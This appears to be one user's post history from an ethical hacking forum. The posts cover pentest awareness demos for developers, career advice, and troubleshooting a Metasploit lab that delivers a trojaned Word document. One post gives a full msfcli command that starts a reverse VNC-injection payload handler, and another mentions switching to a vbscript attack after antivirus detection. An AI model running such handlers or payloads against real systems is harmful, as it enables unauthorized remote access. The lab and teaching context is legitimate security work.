EH-Net
February 10, 2012, 06:10:14 AM
1
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Penetration Testing in the Real World
on: May 04, 2010, 02:18:23 PM
I showed this video to my developers. I used it to interest them in the actual threats posed by "minor holes." It was an attempt to help them understand how a bad guy leverages various holes to gain control of the entire network.
I also showed a sanitized screenshot of sqlmap dumping an HR DB through a simple website. This was an effort to show them the danger of reusing accounts repeatedly.
I think that the combination worked well. I immediately received email questions and comments.
Anyone else try this?
3
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Pen Test Freelancing?!
on: July 02, 2009, 02:19:30 PM
For me it was a combination of networking and training. I was networking, then my boss offered to pay for GPEN. I jumped on that....
After I had that for a few months, a local company asked me to freelance with them as a side job doing pentesting. This has led to other stuff as well.
So, keep learning and get an IT operations job. Meanwhile, network and the opportunities will sneak up and surprise you. Just jumping into the field after a year of schooling will probably be difficult to impossible. Building a resume and professional contacts will get you further in the long run.
4
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
on: February 26, 2009, 11:14:16 AM
Did you try uninstalling and reinstalling? When the MS08_067 exploit arrived, the update function would not pull everything properly. Or it wasn't registering things correctly. This happened to several friends. The fastest fix I found was to uninstall and reinstall the app.
And sorry, didn't mean to sound mean about the Windows thing. I just gave up the Windows version the other day. I tried to make it work until I wanted to practice backgrounding a session and routing through it. It just doesn't work properly in Windows. That's all. I have found the Windows interface to be buggy.
6
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
on: February 17, 2009, 12:44:35 PM
OK. Solved my issues. Well, some of them anyway.... My setup was this: BT3 VM with bridged networking. The trojaned .doc file was executed on the host Office suite. That failed. But, if I operated the exploit from a foreign system, it worked fine. In fact it worked so well, I demoed it in a security presentation. Scared some users (as well it should). Very cool. Anyone know where I can read up on these less well documented exploit techniques? This isn't in the default manual. Thanks.
8
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
on: February 11, 2009, 03:24:47 PM
Well, my VM has an IP of 192.168.1.1. So I added LHOST=192.168.1.1 to the exploit.
Then when running ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.1 DisableCourtesyShell=True E
It doesn't give me a "bind failed" error, it just binds to 0.0.0.0.
This happens in a BT3 VM and on a BT3 laptop install. Would I look for the error/problem in BT3 or in Metasploit 3.2?
9
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
on: February 11, 2009, 02:47:02 PM
Thanks. I was testing this for a presentation but Symantec actually catches it. So, am trying the vbscript attack. Sadly, there is a quirk with either Metasploit or BT3. Not sure which yet. When I run the /msfcli multi/handler PAYLOAD=<payload> LHOST=<IP> etc..., it runs the exploit and binds to IP=0.0.0.0 which is less than helpful. Heh, I guess there was no reason to assume this would be that easy. 